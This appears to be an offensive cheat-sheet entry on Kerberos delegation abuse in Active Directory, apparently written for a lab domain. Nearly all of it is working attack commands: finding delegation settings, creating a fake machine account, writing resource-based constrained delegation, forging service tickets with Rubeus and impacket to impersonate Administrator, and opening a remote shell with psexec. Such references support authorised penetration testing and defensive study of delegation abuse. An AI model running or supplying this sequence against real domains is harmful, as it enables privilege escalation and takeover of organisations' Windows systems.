• Exploitation
• Windows
• Active Directory
• LDAP
• Kerberos
• Credentials
• Shell
• Delegation Abuse

Kerberos delegation abuse — exploit constrained and resource-based constrained delegation (RBCD) to impersonate users.

Credentials

• # Find delegation settings
  impacket-findDelegation senshu.local/sec_user:'P@ssw0rd' -dc-ip 10.10.10.27
  
  # --- Constrained Delegation ---
  .\Rubeus.exe s4u /user:sec_user /rc4:NTHASH /impersonateuser:Administrator /msdsspn:cifs/TARGET.senshu.local /ptt
  
  # --- RBCD (need write access to msDS-AllowedToActOnBehalfOfOtherIdentity) ---
  # RBCD - create machine account 
  impacket-addcomputer senshu.local/sec_user:'P@ssw0rd' -computer-name 'FAKE01$' -computer-pass 'FakePass123' -dc-ip 10.10.10.27
  
  # RBCD — configure delegation from fake computer to target
  impacket-rbcd senshu.local/sec_user:'P@ssw0rd' -delegate-from 'FAKE01$' -delegate-to 'TARGET$' -dc-ip 10.10.10.27 -action write
  # or bloodyAD:
  bloodyAD -d senshu.local -u sec_user -p 'P@ssw0rd' --host 10.10.10.27 add rbcd 'TARGET$' 'FAKE01$'
  
  # RBCD — request service ticket via S4U
  impacket-getST senshu.local/'FAKE01$':'FakePass123' -spn cifs/TARGET.senshu.local -impersonate Administrator -dc-ip 10.10.10.27
  
  # Use the ticket
  export KRB5CCNAME=Administrator.ccache
  impacket-psexec senshu.local/Administrator@TARGET.senshu.local -k -no-pass
  

Shell

• # RBCD from Windows
  Set-ADComputer TARGET -PrincipalsAllowedToDelegateToAccount FAKE01$
  .\Rubeus.exe s4u /user:FAKE01$ /rc4:NTHASH /impersonateuser:Administrator /msdsspn:cifs/TARGET.senshu.local /ptt
  

References:

https://github.com/fortra/impacket

https://github.com/GhostPack/Rubeus

https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html